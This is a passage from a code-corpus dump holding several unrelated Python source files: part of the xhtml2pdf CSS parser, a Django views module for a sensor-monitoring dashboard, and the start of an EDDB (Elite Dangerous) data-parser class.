u'\\\\\\\\[ -~\\200-\\377]')\n # i_nmstart = _orRule('[A-Za-z_]', i_nonascii, i_escape)\n i_nmstart = _orRule('\\-[^0-9]|[A-Za-z_]', i_nonascii,\n i_escape) # XXX Added hyphen, http://www.w3.org/TR/CSS21/syndata.html#value-def-identifier\n i_nmchar = _orRule('[-0-9A-Za-z_]', i_nonascii, i_escape)\n i_ident = '((?:%s)(?:%s)*)' % (i_nmstart, i_nmchar)\n re_ident = re.compile(i_ident, _reflags)\n # Caution: treats all characters above 0x7f as legal for an identifier.\n i_unicodeid = r'([^\\u0000-\\u007f]+)'\n re_unicodeid = re.compile(i_unicodeid, _reflags)\n i_element_name = '((?:%s)|\\*)' % (i_ident[1:-1],)\n re_element_name = re.compile(i_element_name, _reflags)\n i_namespace_selector = '((?:%s)|\\*|)\\|(?!=)' % (i_ident[1:-1],)\n re_namespace_selector = re.compile(i_namespace_selector, _reflags)\n i_class = '\\\\.' + i_ident\n re_class = re.compile(i_class, _reflags)\n i_hash = '#((?:%s)+)' % i_nmchar\n re_hash = re.compile(i_hash, _reflags)\n i_rgbcolor = '(#%s{6}|#%s{3})' % (i_hex, i_hex)\n re_rgbcolor = re.compile(i_rgbcolor, _reflags)\n i_nl = u'\\n|\\r\\n|\\r|\\f'\n i_escape_nl = u'\\\\\\\\(?:%s)' % i_nl\n i_string_content = _orRule(u'[\\t !#$%&(-~]', i_escape_nl, i_nonascii, i_escape)\n i_string1 = u'\\\"((?:%s|\\')*)\\\"' % i_string_content\n i_string2 = u'\\'((?:%s|\\\")*)\\'' % i_string_content\n i_string = _orRule(i_string1, i_string2)\n re_string = re.compile(i_string, _reflags)\n i_uri = (u'url\\\\(\\s*(?:(?:%s)|((?:%s)+))\\s*\\\\)'\n % (i_string, _orRule('[!#$%&*-~]', i_nonascii, i_escape)))\n # XXX For now\n # i_uri = u'(url\\\\(.*?\\\\))'\n re_uri = re.compile(i_uri, _reflags)\n i_num = u'(([-+]?[0-9]+(?:\\\\.[0-9]+)?)|([-+]?\\\\.[0-9]+))' # XXX Added out paranthesis, because e.g. .5em was not parsed correctly\n re_num = re.compile(i_num, _reflags)\n i_unit = '(%%|%s)?' % i_ident\n re_unit = re.compile(i_unit, _reflags)\n i_function = i_ident + '\\\\('\n re_function = re.compile(i_function, _reflags)\n i_functionterm = u'[-+]?' + i_function\n re_functionterm = re.compile(i_functionterm, _reflags)\n i_unicoderange1 = \"(?:U\\\\+%s{1,6}-%s{1,6})\" % (i_hex, i_hex)\n i_unicoderange2 = \"(?:U\\\\+\\?{1,6}|{h}(\\?{0,5}|{h}(\\?{0,4}|{h}(\\?{0,3}|{h}(\\?{0,2}|{h}(\\??|{h}))))))\"\n i_unicoderange = i_unicoderange1 # u'(%s|%s)' % (i_unicoderange1, i_unicoderange2)\n re_unicoderange = re.compile(i_unicoderange, _reflags)\n\n # i_comment = u'(?:\\/\\*[^*]*\\*+([^/*][^*]*\\*+)*\\/)|(?://.*)'\n # gabriel: only C convention for comments is allowed in CSS\n i_comment = u'(?:\\/\\*[^*]*\\*+([^/*][^*]*\\*+)*\\/)'\n re_comment = re.compile(i_comment, _reflags)\n i_important = u'!\\s*(important)'\n re_important = re.compile(i_important, _reflags)\n del _orRule\n\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # ~ Public\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n def __init__(self, css_builder=None):\n self._css_builder = css_builder\n\n # ~ CSS Builder to delegate to ~~~~~~~~~~~~~~~~~~~~~~~~\n\n @property\n def css_builder(self):\n \"\"\"A concrete instance implementing CSSBuilderAbstract\"\"\"\n return self._css_builder\n\n @css_builder.setter\n def css_builder(self, value):\n \"\"\"A concrete instance implementing CSSBuilderAbstract\"\"\"\n self._css_builder = value\n\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # ~ Public CSS Parsing API\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n def parse_file(self, srcFile, closeFile=False):\n \"\"\"Parses CSS file-like objects using the current cssBuilder.\n Use for external stylesheets.\"\"\"\n\n try:\n result = self.parse(srcFile.read())\n finally:\n if closeFile:\n srcFile.close()\n return result\n\n def parse(self, src):\n \"\"\"\n\n Parses CSS string source using the current cssBuilder.\n\n Use for embedded stylesheets.\n\n :param src:\n :type src: str\n \"\"\"\n\n self.css_builder.begin_stylesheet()\n if not isinstance(src, six.text_type):\n src = src.decode() # FIXME use text from the get-go\n assert isinstance(src, six.text_type), \"'src' must be text!\"\n try:\n # XXX Some simple preprocessing\n src = cleanup_css(src)\n try:\n src, stylesheet = self._parse_stylesheet(src)\n except self.ParseError as err:\n err.setFullCSSSource(src)\n raise\n finally:\n self.css_builder.end_stylesheet()\n return stylesheet\n\n def parse_inline(self, src):\n \"\"\"Parses CSS inline source string using the current cssBuilder.\n Use to parse a tag's 'style'-like attribute.\"\"\"\n self.css_builder.begin_inline()\n try:\n try:\n src, properties = self._parse_declaration_group(src.strip(), braces=False)\n except self.ParseError as err:\n err.setFullCSSSource(src, inline=True)\n raise\n\n result = self.css_builder.inline(properties)\n finally:\n self.css_builder.end_inline()\n return result\n\n def parse_attributes(self, attributes=None, **kwAttributes):\n \"\"\"Parses CSS attribute source strings, and return as an inline stylesheet.\n Use to parse a tag's highly CSS-based attributes like 'font'.\n\n See also: parseSingleAttr\n \"\"\"\n if attributes is None:\n attributes = {}\n if attributes:\n kwAttributes.update(attributes)\n\n self.css_builder.begin_inline()\n try:\n properties = []\n for propertyName, src in kwAttributes.items():\n try:\n src, property = self._parse_declaration_property(src.strip(), propertyName)\n properties.append(property)\n except self.ParseError as err:\n err.setFullCSSSource(src, inline=True)\n raise\n result = self.css_builder.inline(properties)\n finally:\n self.css_builder.end_inline()\n return result\n\n def parse_single_attr(self, attrValue):\n \"\"\"Parse a single CSS attribute source string, and returns the built CSS expression.\n Use to parse a tag's highly CSS-based attributes like 'font'.\n\n See also: parseAttributes\n \"\"\"\n\n results = self.parse_attributes(temp=attrValue)\n if 'temp' in results[1]:\n return results[1]['temp']\n else:\n return results[0]['temp']\n\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # ~ Internal _parse methods\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n def _parse_stylesheet(self, src):\n \"\"\"stylesheet\n : [ CHARSET_SYM S* STRING S* ';' ]?\n [S|CDO|CDC]* [ import [S|CDO|CDC]* ]*\n [ [ ruleset | media | page | font_face ] [S|CDO|CDC]* ]*\n ;\n \"\"\"\n # Get rid of the comments\n src = self.re_comment.sub(six.u(''), src)\n\n # [ CHARSET_SYM S* STRING S* ';' ]?\n src = self._parse_at_charset(src)\n\n # [S|CDO|CDC]*\n src = self._parse_s_cdo_cdc(src)\n # [ import [S|CDO|CDC]* ]*\n src, stylesheet_imports = self._parse_at_imports(src)\n\n # [ namespace [S|CDO|CDC]* ]*\n src = self._parse_at_namespace(src)\n\n stylesheet_elements = []\n\n # [ [ ruleset | atkeywords ] [S|CDO|CDC]* ]*\n while src: # due to ending with ]*\n if src.startswith('@'):\n # @media, @page, @font-face\n src, at_results = self._parse_at_keyword(src)\n if at_results is not None and at_results != NotImplemented:\n stylesheet_elements.extend(at_results)\n else:\n # ruleset\n src, ruleset = self._parse_ruleset(src)\n stylesheet_elements.append(ruleset)\n\n # [S|CDO|CDC]*\n src = self._parse_s_cdo_cdc(src)\n\n stylesheet = self.css_builder.stylesheet(stylesheet_elements, stylesheet_imports)\n return src, stylesheet\n\n def _parse_s_cdo_cdc(self, src):\n \"\"\"[S|CDO|CDC]*\"\"\"\n while True:\n src = src.lstrip()\n if src.startswith(''):\n src = src[3:]\n else:\n break\n return src\n\n # ~ CSS @ directives ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n def _parse_at_charset(self, src):\n \"\"\"[ CHARSET_SYM S* STRING S* ';' ]?\"\"\"\n if is_at_rule_ident(src, 'charset'):\n ctxsrc = src\n src = strip_at_rule_ident(src)\n charset, src = self._get_string(src)\n src = src.lstrip()\n if src[:1] != ';':\n raise self.ParseError('@charset expected a terminating \\';\\'', src, ctxsrc)\n src = src[1:].lstrip()\n\n self.css_builder.at_charset(charset)\n return src\n\n def _parse_at_imports(self, src):\n \"\"\"[ import [S|CDO|CDC]* ]*\"\"\"\n result = []\n while is_at_rule_ident(src, 'import'):\n ctxsrc = src\n src = strip_at_rule_ident(src)\n\n import_, src = self._get_string_or_uri(src)\n if import_ is None:\n raise self.ParseError('Import expecting string or url', src, ctxsrc)\n\n mediums = []\n medium, src = self._get_ident(src.lstrip())\n while medium is not None:\n mediums.append(medium)\n if src[:1] == ',':\n src = src[1:].lstrip()\n medium, src = self._get_ident(src)\n else:\n break\n\n # XXX No medium inherits and then \"all\" is appropriate\n if not mediums:\n mediums = [\"all\"]\n\n if src[:1] != ';':\n raise self.ParseError('@import expected a terminating \\';\\'', src, ctxsrc)\n src = src[1:].lstrip()\n\n stylesheet = self.css_builder.at_import(import_, mediums, self)\n if stylesheet is not None:\n result.append(stylesheet)\n\n src = self._parse_s_cdo_cdc(src)\n return src, result\n\n def _parse_at_namespace(self, src):\n \"\"\"namespace :\n\n @namespace S* [IDENT S*]? [STRING|URI] S* ';' S*\n \"\"\"\n\n src = self._parse_s_cdo_cdc(src)\n while is_at_rule_ident(src, 'namespace'):\n ctxsrc = src\n src = strip_at_rule_ident(src)\n\n namespace, src = self._get_string_or_uri(src)\n if namespace is None:\n nsPrefix, src = self._get_ident(src)\n if nsPrefix is None:\n raise self.ParseError('@namespace expected an identifier or a URI', src, ctxsrc)\n namespace, src = self._get_string_or_uri(src.lstrip())\n if namespace is None:\n raise self.ParseError('@namespace expected a URI', src, ctxsrc)\n else:\n nsPrefix = None\n\n src = src.lstrip()\n if src[:1] != ';':\n raise self.ParseError('@namespace expected a terminating \\';\\'', src, ctxsrc)\n src = src[1:].lstrip()\n\n self.css_builder.at_namespace(nsPrefix, namespace)\n\n src = self._parse_s_cdo_cdc(src)\n return src\n\n def _parse_at_keyword(self, src):\n \"\"\"[media | page | font_face | unknown_keyword]\"\"\"\n ctxsrc = src\n if is_at_rule_ident(src, 'media'):\n src, result = self._parse_at_media(src)\n elif is_at_rule_ident(src, 'page'):\n src, result = self._parse_at_page(src)\n elif is_at_rule_ident(src, 'font-face'):\n src, result = self._parse_at_font_face(src)\n # XXX added @import, was missing!\n elif is_at_rule_ident(src, 'import'):\n src, result = self._parse_at_imports(src)\n elif is_at_rule_ident(src, 'frame'):\n src, result = self._parse_at_frame(src)\n elif src.startswith('@'):\n src, result = self._parse_at_ident(src)\n else:\n raise self.ParseError('Unknown state in atKeyword', src, ctxsrc)\n return src, result\n\n def _parse_at_media(self, src):\n \"\"\"media\n : MEDIA_SYM S* medium [ ',' S* medium ]* '{' S* ruleset* '}' S*\n ;\n \"\"\"\n ctxsrc = src\n src = src[len('@media '):].lstrip()\n mediums = []\n while src and src[0] != '{':\n medium, src = self._get_ident(src)\n if medium is None:\n raise self.ParseError('@media rule expected media identifier', src, ctxsrc)\n # make \"and ... {\" work\n if medium == u'and':\n # strip up to curly bracket\n pattern = re.compile('.*({.*)')\n match = re.match(pattern, src)\n src = src[match.end()-1:]\n break\n mediums.append(medium)\n if src[0] == ',':\n src = src[1:].lstrip()\n else:\n src = src.lstrip()\n\n if not src.startswith('{'):\n raise self.ParseError('Ruleset opening \\'{\\' not found', src, ctxsrc)\n src = src[1:].lstrip()\n\n stylesheet_elements = []\n # while src and not src.startswith('}'):\n # src, ruleset = self._parseRuleset(src)\n # stylesheetElements.append(ruleset)\n # src = src.lstrip()\n\n # Containing @ where not found and parsed\n while src and not src.startswith('}'):\n if src.startswith('@'):\n # @media, @page, @font-face\n src, atResults = self._parse_at_keyword(src)\n if atResults is not None:\n stylesheet_elements.extend(atResults)\n else:\n # ruleset\n src, ruleset = self._parse_ruleset(src)\n stylesheet_elements.append(ruleset)\n src = src.lstrip()\n\n if not src.startswith('}'):\n raise self.ParseError('Ruleset closing \\'}\\' not found', src, ctxsrc)\n else:\n src = src[1:].lstrip()\n\n result = self.css_builder.at_media(mediums, stylesheet_elements)\n return src, result\n\n def _parse_at_page(self, src):\n \"\"\"page\n : PAGE_SYM S* IDENT? pseudo_page? S*\n '{' S* declaration [ ';' S* declaration ]* '}' S*\n ;\n \"\"\"\n ctxsrc = src\n src = src[len('@page '):].lstrip()\n page, src = self._get_ident(src)\n if src[:1] == ':':\n pseudopage, src = self._get_ident(src[1:])\n page = page + '_' + pseudopage\n else:\n pseudopage = None\n\n # src, properties = self._parseDeclarationGroup(src.lstrip())\n\n # Containing @ where not found and parsed\n stylesheet_elements = []\n src = src.lstrip()\n properties = []\n\n # XXX Extended for PDF use\n if not src.startswith('{'):\n raise self.ParseError('Ruleset opening \\'{\\' not found', src, ctxsrc)\n else:\n src = src[1:].lstrip()\n\n while src and not src.startswith('}'):\n if src.startswith('@'):\n # @media, @page, @font-face\n src, at_results = self._parse_at_keyword(src)\n if at_results is not None:\n stylesheet_elements.extend(at_results)\n else:\n src, nproperties = self._parse_declaration_group(src.lstrip(), braces=False)\n properties += nproperties\n src = src.lstrip()\n\n result = [self.css_builder.at_page(page, pseudopage, properties)]\n\n return src[1:].lstrip(), result\n\n def _parse_at_frame(self, src):\n \"\"\"\n XXX Proprietary for PDF\n \"\"\"\n ctxsrc = src\n src = src[len('@frame '):].lstrip()\n box, src = self._get_ident(src)\n src, properties = self._parse_declaration_group(src.lstrip())\n result = [self.css_builder.at_frame(box, properties)]\n return src.lstrip(), result\n\n def _parse_at_font_face(self, src):\n ctxsrc = src\n src = src[len('@font-face '):].lstrip()\n src, properties = self._parse_declaration_group(src)\n result = [self.css_builder.at_font_face(properties)]\n return src, result\n\n def _parse_at_ident(self, src):\n ctxsrc = src\n atIdent, src = self._get_ident(src[1:])\n if atIdent is None:\n raise self.ParseError('At-rule expected an identifier for the rule', src, ctxsrc)\n\n src, result = self.css_builder.at_ident(atIdent, self, src)\n\n if result is NotImplemented:\n # An at-rule consists of everything up to and including the next semicolon (;) or the next block,\n # whichever comes first\n\n semiIdx = src.find(';')\n if semiIdx < 0:\n semiIdx = None\n blockIdx = src[:semiIdx].find('{')\n if blockIdx < 0:\n blockIdx = None\n\n if semiIdx is not None and semiIdx < blockIdx:\n src = src[semiIdx + 1:].lstrip()\n elif blockIdx is None:\n # consume the rest of the content since we didn't find a block or a semicolon\n src = src[-1:-1]\n elif blockIdx is not None:\n # expecing a block...\n src = src[blockIdx:]\n try:\n # try to parse it as a declarations block\n src, declarations = self._parse_declaration_group(src)\n except self.ParseError:\n # try to parse it as a stylesheet block\n src, stylesheet = self._parse_stylesheet(src)\n else:\n raise self.ParseError('Unable to ignore @-rule block', src, ctxsrc)\n\n return src.lstrip(), result\n\n # ~ ruleset - see selector and declaration groups ~~~~\n\n def _parse_ruleset(self, src):\n \"\"\"ruleset\n : selector [ ',' S* selector ]*\n '{' S* declaration [ ';' S* declaration ]* '}' S*\n ;\n \"\"\"\n src, selectors = self._parse_selector_group(src)\n src, properties = self._parse_declaration_group(src.lstrip())\n result = self.css_builder.ruleset(selectors, properties)\n return src, result\n\n # ~ selector parsing ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n def _parse_selector_group(self, src):\n selectors = []\n while src[:1] not in ('{', '}', ']', '(', ')', ';', ''):\n src, selector = self._parse_selector(src)\n if selector is None:\n break\n selectors.append(selector)\n if src.startswith(','):\n src = src[1:].lstrip()\n return src, selectors\n\n def _parse_selector(self, src):\n \"\"\"selector\n : simple_selector [ combinator simple_selector ]*\n ;\n \"\"\"\n src, selector = self._parse_simple_selector(src)\n srcLen = len(src) # XXX\n while src[:1] not in ('', ',', ';', '{', '}', '[', ']', '(', ')'):\n for combiner in self.selector_combiners:\n if src.startswith(combiner):\n src = src[len(combiner):].lstrip()\n break\n else:\n combiner = ' '\n src, selectorB = self._parse_simple_selector(src)\n\n # XXX Fix a bug that occured here e.g. : .1 {...}\n if len(src) >= srcLen:\n src = src[1:]\n while src and (src[:1] not in ('', ',', ';', '{', '}', '[', ']', '(', ')')):\n src = src[1:]\n return src.lstrip(), None\n\n selector = self.css_builder.combine_selectors(selector, combiner, selectorB)\n\n return src.lstrip(), selector\n\n def _parse_simple_selector(self, src):\n \"\"\"simple_selector\n : [ namespace_selector ]? element_name? [ HASH | class | attrib | pseudo ]* S*\n ;\n \"\"\"\n ctxsrc = src.lstrip()\n nsPrefix, src = self._get_match_result(self.re_namespace_selector, src)\n name, src = self._get_match_result(self.re_element_name, src)\n if name:\n pass # already *successfully* assigned\n elif src[:1] in self.selector_qualifiers:\n name = '*'\n else:\n raise self.ParseError('Selector name or qualifier expected', src, ctxsrc)\n\n name = self.css_builder.resolve_namespace_prefix(nsPrefix, name)\n selector = self.css_builder.selector(name)\n while src and src[:1] in self.selector_qualifiers:\n hash_, src = self._get_match_result(self.re_hash, src)\n if hash_ is not None:\n selector.add_hash_id(hash_)\n continue\n\n class_, src = self._get_match_result(self.re_class, src)\n if class_ is not None:\n selector.add_class(class_)\n continue\n\n if src.startswith('['):\n src, selector = self._parse_selector_attribute(src, selector)\n elif src.startswith(':'):\n src, selector = self._parse_selector_pseudo(src, selector)\n else:\n break\n\n return src.lstrip(), selector\n\n def _parse_selector_attribute(self, src, selector):\n \"\"\"attrib\n : '[' S* [ namespace_selector ]? IDENT S* [ [ '=' | INCLUDES | DASHMATCH ] S*\n [ IDENT | STRING ] S* ]? ']'\n ;\n \"\"\"\n ctxsrc = src\n if not src.startswith('['):\n raise self.ParseError('Selector Attribute opening \\'[\\' not found', src, ctxsrc)\n src = src[1:].lstrip()\n\n nsPrefix, src = self._get_match_result(self.re_namespace_selector, src)\n attrName, src = self._get_ident(src)\n\n src = src.lstrip()\n\n if attrName is None:\n raise self.ParseError('Expected a selector attribute name', src, ctxsrc)\n if nsPrefix is not None:\n attrName = self.css_builder.resolve_namespace_prefix(nsPrefix, attrName)\n\n for op in self.attribute_operators:\n if src.startswith(op):\n break\n else:\n op = ''\n src = src[len(op):].lstrip()\n\n if op:\n attrValue, src = self._get_ident(src)\n if attrValue is None:\n attrValue, src = self._get_string(src)\n if attrValue is None:\n raise self.ParseError('Expected a selector attribute value', src, ctxsrc)\n else:\n attrValue = None\n\n if not src.startswith(']'):\n raise self.ParseError('Selector Attribute closing \\']\\' not found', src, ctxsrc)\n else:\n src = src[1:]\n\n if op:\n selector.add_attribute_operation(attrName, op, attrValue)\n else:\n selector.add_attribute(attrName)\n return src, selector\n\n def _parse_selector_pseudo(self, src, selector):\n \"\"\"pseudo\n : ':' [ IDENT | function ]\n ;\n \"\"\"\n ctxsrc = src\n if not src.startswith(':'):\n raise self.ParseError('Selector Pseudo \\':\\' not found', src, ctxsrc)\n src = re.search('^:{1,2}(.*)', src, re.M | re.S).group(1)\n\n name, src = self._get_ident(src)\n if not name:\n raise self.ParseError('Selector Pseudo identifier not found', src, ctxsrc)\n\n if src.startswith('('):\n # function\n src = src[1:].lstrip()\n src, term = self._parse_expression(src, True)\n if not src.startswith(')'):\n raise self.ParseError('Selector Pseudo Function closing \\')\\' not found', src, ctxsrc)\n src = src[1:]\n selector.add_pseudo_function(name, term)\n else:\n selector.add_pseudo(name)\n\n return src, selector\n\n # ~ declaration and expression parsing ~~~~~~~~~~~~~~~\n\n def _parse_declaration_group(self, src, braces=True):\n ctxsrc = src\n if src.startswith('{'):\n src, braces = src[1:], True\n elif braces:\n raise self.ParseError('Declaration group opening \\'{\\' not found', src, ctxsrc)\n\n properties = []\n src = src.lstrip()\n while src[:1] not in ('', ',', '{', '}', '[', ']', '(', ')', '@'): # XXX @?\n src, property = self._parse_declaration(src)\n\n # XXX Workaround for styles like \"*font: smaller\"\n if src.startswith(\"*\"):\n src = \"-nothing-\" + src[1:]\n continue\n\n if property is None:\n break\n properties.append(property)\n if src.startswith(';'):\n src = src[1:].lstrip()\n else:\n break\n\n if braces:\n if not src.startswith('}'):\n raise self.ParseError('Declaration group closing \\'}\\' not found', src, ctxsrc)\n src = src[1:]\n\n return src.lstrip(), properties\n\n def _parse_declaration(self, src):\n \"\"\"declaration\n : ident S* ':' S* expr prio?\n | /* empty */\n ;\n \"\"\"\n # property\n property_name, src = self._get_ident(src)\n\n if property_name is not None:\n src = src.lstrip()\n # S* : S*\n if src[:1] in (':', '='):\n # Note: we are being fairly flexable here... technically, the\n # \":\" is *required*, but in the name of flexibility we\n # suppor a null transition, as well as an \"=\" transition\n src = src[1:].lstrip()\n\n src, property = self._parse_declaration_property(src, property_name)\n else:\n property = None\n\n return src, property\n\n def _parse_declaration_property(self, src, propertyName):\n # expr\n src, expr = self._parse_expression(src)\n\n # prio?\n important, src = self._get_match_result(self.re_important, src)\n src = src.lstrip()\n\n property = self.css_builder.property(propertyName, expr, important)\n return src, property\n\n def _parse_expression(self, src, returnList=False):\n \"\"\"\n expr\n : term [ operator term ]*\n ;\n \"\"\"\n src, term = self._parse_expression_term(src)\n operator = None\n while src[:1] not in ('', ';', '{', '}', '[', ']', ')'):\n for operator in self.expression_operators:\n if src.startswith(operator):\n src = src[len(operator):]\n break\n else:\n operator = ' '\n src, term2 = self._parse_expression_term(src.lstrip())\n if term2 is NotImplemented:\n break\n else:\n term = self.css_builder.combine_terms(term, operator, term2)\n\n if operator is None and returnList:\n term = self.css_builder.combine_terms(term, None, None)\n return src, term\n else:\n return src, term\n\n def _parse_expression_term(self, src):\n \"\"\"term\n : unary_operator?\n [ NUMBER S* | PERCENTAGE S* | LENGTH S* | EMS S* | EXS S* | ANGLE S* |\n TIME S* | FREQ S* | function ]\n | STRING S* | IDENT S* | URI S* | RGB S* | UNICODERANGE S* | hexcolor\n ;\n \"\"\"\n ctxsrc = src\n\n result, src = self._get_match_result(self.re_num, src)\n if result is not None:\n units, src = self._get_match_result(self.re_unit, src)\n term = self.css_builder.term_number(result, units)\n return src.lstrip(), term\n\n result, src = self._get_string(src, self.re_uri)\n if result is not None:\n # XXX URL!!!!\n term = self.css_builder.term_uri(result)\n return src.lstrip(), term\n\n result, src = self._get_string(src)\n if result is not None:\n term = self.css_builder.term_string(result)\n return src.lstrip(), term\n\n result, src = self._get_match_result(self.re_functionterm, src)\n if result is not None:\n src, params = self._parse_expression(src, True)\n if src[0] != ')':\n raise self.ParseError('Terminal function expression expected closing \\')\\'', src, ctxsrc)\n src = src[1:].lstrip()\n term = self.css_builder.term_function(result, params)\n return src, term\n\n result, src = self._get_match_result(self.re_rgbcolor, src)\n if result is not None:\n term = self.css_builder.term_rgb(result)\n return src.lstrip(), term\n\n result, src = self._get_match_result(self.re_unicoderange, src)\n if result is not None:\n term = self.css_builder.term_unicode_range(result)\n return src.lstrip(), term\n\n nsPrefix, src = self._get_match_result(self.re_namespace_selector, src)\n result, src = self._get_ident(src)\n if result is not None:\n if nsPrefix is not None:\n result = self.css_builder.resolve_namespace_prefix(nsPrefix, result)\n term = self.css_builder.term_ident(result)\n return src.lstrip(), term\n\n result, src = self._get_match_result(self.re_unicodeid, src)\n if result is not None:\n term = self.css_builder.term_ident(result)\n return src.lstrip(), term\n\n return self.css_builder.term_unknown(src)\n\n # ~ utility methods ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n def _get_ident(self, src, default=None):\n return self._get_match_result(self.re_ident, src, default)\n\n def _get_string(self, src, rexpression=None, default=None):\n if rexpression is None:\n rexpression = self.re_string\n result = rexpression.match(src)\n if result:\n strres = filter(None, result.groups())\n if strres:\n try:\n strres = strres[0]\n except Exception:\n strres = result.groups()[0]\n else:\n strres = ''\n return strres, src[result.end():]\n else:\n return default, src\n\n def _get_string_or_uri(self, src):\n result, src = self._get_string(src, self.re_uri)\n if result is None:\n result, src = self._get_string(src)\n return result, src\n\n def _get_match_result(self, rexpression, src, default=None, group=1):\n result = rexpression.match(src)\n if result:\n return result.group(group), src[result.end():]\n else:\n return default, src\n\n","sub_path":"xhtml2pdf/w3c/cssParser.py","file_name":"cssParser.py","file_ext":"py","file_size_in_byte":40603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"275854763","text":"from django.shortcuts import render, redirect\nfrom provaserver.forms import RegistrationForm\nfrom django.contrib.auth.forms import UserChangeForm\nfrom django.contrib.auth.decorators import login_required\nfrom provaserver.models import Impianto, Sensore, Rilevazione, Terze_Parti\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\nfrom untitled1.serializers import RilevSerializer, SensoreSerializer, ImpiantoSerializer\n\n\ndef login_redirect(self):\n\n return redirect('/login')\n\n\n# view di registrazione:\n\n\ndef register(request):\n if request.method == 'POST':\n form = RegistrationForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('/login')\n else:\n return redirect('/register')\n else:\n form = RegistrationForm()\n args = {'form': form}\n return render(request, 'provaserver/reg_form.html', args)\n\n# view visualizzazione profilo admin o cliente:\n\n\n@login_required\ndef view_profile(request):\n\n args = {'user': request.user}\n utente = request.user.is_staff\n\n if utente:\n\n return render(request, 'provaserver/profile.html', args)\n else:\n return redirect('/dashboard')\n\n# view visualizzazione dashboard impianti:\n\n\n@login_required\ndef view_dashboard(request):\n\n impianti = Impianto.objects.all().filter(user=request.user) # prendi l'utente loggato porca la madonna puttana\n context = {'impianti': impianti}\n return render(request, 'provaserver/dashboard.html', context)\n\n# view visualizzazione dashboard sensori:\n\n\n@login_required\ndef view_sensors(request):\n sensori = Sensore.objects.all().filter(user=request.user)\n context1 = {'sensori': sensori}\n return render(request, 'provaserver/sensors.html', context1)\n\n# view visualizzazione dashboard rilevazioni:\n\n\n@login_required\ndef view_detections(request):\n rilevazioni = Rilevazione.objects.all().filter(user=request.user)\n context = {'rilevazioni': rilevazioni}\n return render(request, 'provaserver/detections.html', context)\n\n# view visualizzazione dashboard terze parti:\n\n\n@login_required\ndef view_thirdparts(request):\n\n terzeparti = Terze_Parti.objects.all().filter(user=request.user)\n context = {'terzeparti': terzeparti}\n return render(request, 'provaserver/thirdparts.html', context)\n\n# view visualizzazione modifica profilo admin:\n\n\n@login_required\ndef edit_profile(request):\n\n if request.method == 'POST':\n form = UserChangeForm(request.POST, instance=request.user)\n if form.is_valid():\n form.save()\n return redirect('/profile')\n else:\n return redirect('provaserver//edit_profile.html/')\n\n else:\n form = UserChangeForm(instance=request.user)\n args = {'form': form}\n return render(request, 'provaserver//edit_profile.html/', args)\n\n# view pagina informazioni:\n\n\ndef info_redirect(request):\n\n return render(request, 'provaserver/informazioni.html')\n\n\n@api_view(['GET'])\ndef rilevazioni_collection(request):\n \"\"\"\n List all snippets, or create a new snippet.\n \"\"\"\n if request.method == 'GET':\n rileva = Rilevazione.objects.all()\n serializer = RilevSerializer(rileva, many=True)\n return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef sensore_collection(request):\n if request.method == 'GET':\n posts = Sensore.objects.all()\n serializer = SensoreSerializer(posts, many=True)\n return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef impianto_collection(request):\n if request.method == 'GET':\n posts = Impianto.objects.all()\n serializer = ImpiantoSerializer(posts, many=True)\n return Response(serializer.data)\n","sub_path":"untitled1.2(Kiuwan99.9%) copia/untitled1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"178163334","text":"# -*- coding:utf-8 -*-\n# ! python3\n\n'''\n Copyright 2017 Sebastian Bauer\n \n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n \n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License. \n'''\n\nimport os\nimport json\nimport csv\nimport sys\nimport multiprocessing as mp\nfrom abc import ABC, abstractmethod\nfrom collections import namedtuple\nfrom typing import Dict, List\nfrom EddbFilter import AbstractEddbFilter\nfrom EliteSystem import EliteSystem\n\nFilterWrapper = namedtuple(\"FilterWrapper\", \"filterClass, systemDictionary, filterDictionary, filteredSystems\")\n\nclass AbstractEddbParser(ABC):\n def __init__(self, dir: str, filters: List[AbstractEddbFilter]):\n self.steps = 100 * 1000\n self.filters = dict() # key: filterName; value: FilterWrapper\n self.dir = dir\n\n # systemDictionary: dict; # key = EDDB id, value = EliteSystem\n # filterDictionary: dict; key = EDDB id, value = dictionary of filter names as key and boolean as value\n # filteredSystems: list of EliteSystems\n for eddbFilter in filters:\n self.filters.setdefault(eddbFilter.uniqueFilterName(), FilterWrapper(eddbFilter, dict(), dict(), list()))\n\n @abstractmethod\n def parseSystems(self):\n \"\"\"Parse the systems.csv. It also fills systemDictionary and filterDictionary for each filter class.\n AbstractEddbFilter.filterSystems() is called for each system while parsing the file.\n This method has to be executed first.\n \"\"\"\n raise NotImplementedError(\"Implement parseSystems\")\n\n @abstractmethod\n def parseBodies(self):\n \"\"\"Parse bodies.jsonl. It fills filterDictionary for each filter class but only in systems\n that are in systemDictionary for that particular filter class.\n AbstractEddbFilter.setFiltersBody() is called for each body, that is within system that is not filtered out, while parsing the file.\n \"\"\"\n raise NotImplementedError(\"Implement parseBodies\")\n\n def applyFilters(self):\n \"\"\"Apply the filters for each system. \n 